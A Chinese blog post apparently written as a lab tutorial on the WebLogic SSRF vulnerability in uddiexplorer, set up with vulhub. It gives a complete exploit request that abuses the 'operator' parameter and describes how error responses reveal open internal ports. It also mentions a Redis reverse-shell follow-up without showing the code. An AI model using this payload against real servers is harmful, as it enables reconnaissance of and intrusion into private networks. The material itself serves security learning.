【研究】weblogic漏洞系列-SSRF漏洞

@TOC

1.环境

环境
https://github.com/vulhub/vulhub/blob/master/README.zh-cn.md
这个搭环境很方便快捷,具体可以看说明,很简单

2.原理

Weblogic中存在一个SSRF漏洞,利用该漏洞可以发送任意HTTP请求,进而攻击内网中redis、fastcgi等脆弱组件。
访问http://ip:7001/uddiexplorer/,无需登录即可查看uddiexplorer

3.影响版本

4.利用过程

环境打开

SSRF漏洞存在于http://your-ip:7001/uddiexplorer/SearchPublicRegistries.jsp,直接访问

在这里插入图片描述

payload:
?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://127.0.0.1:7001

加入url

http://10.77.0.130:7001/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://127.0.0.1:7001

`

关键点是operator这个参数

  • 可访问的端口将会得到错误,访问7001端口时返回一个404的状态码。
  • 修改为一个不存在的端口,将会返回could not connect over HTTP to server

存在


在这里插入图片描述

不存在


在这里插入图片描述

内网端口探测

我们可以根据返回的不同状态信息,来判断内网的IP是否存在以及对应端口是否开放。这里有一个地方需要注意的是,需要知道目标内网网段。如果盲目的去进行网段扫描会耗费大量的时间。

实战挖掘中发现这个位置有可能会泄露内网网段。

实战存在的情况


在这里插入图片描述

注入HTTP头,利用Redis反弹shell

下一遍分开写吧,是可以的

©著作权归作者所有,转载或内容合作请联系作者
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

推荐阅读更多精彩内容

  • 0x01前言: SSRF漏洞的原理这里就不在细说了,这里主要讲解weblogic中SSRF漏洞的检测办法,以及利用...
    zksmile阅读 15,046评论 3 3
  • 靶机说明 目标ip:172.16.53.28(window 2003) 本靶机所针对的序列化漏洞系列以及常见安全问...
    孤君蓑笠翁阅读 3,243评论 0 1
  • @周同学,听说你最近很膨胀呀,那我那我~就......算了,算了吧,不行我还是,还是要把你戳漏气............
    二潘阅读 2,069评论 0 5
  • 无关乎任何情感纠葛,仅想记录今天的一件事和一撮儿感受。 有点阴沉的天气带了点霾,陪怀孕八月有余的闺蜜去公园散散步顺...
    胡小刀阅读 272评论 0 0
  • 不知道是不是所有的春天都是这样,天气总是变化无常! 已经很强烈地感受到春的气息了!街边的树儿发芽了,一些光秃的枝干...
    午夜白兰度阅读 856评论 0 2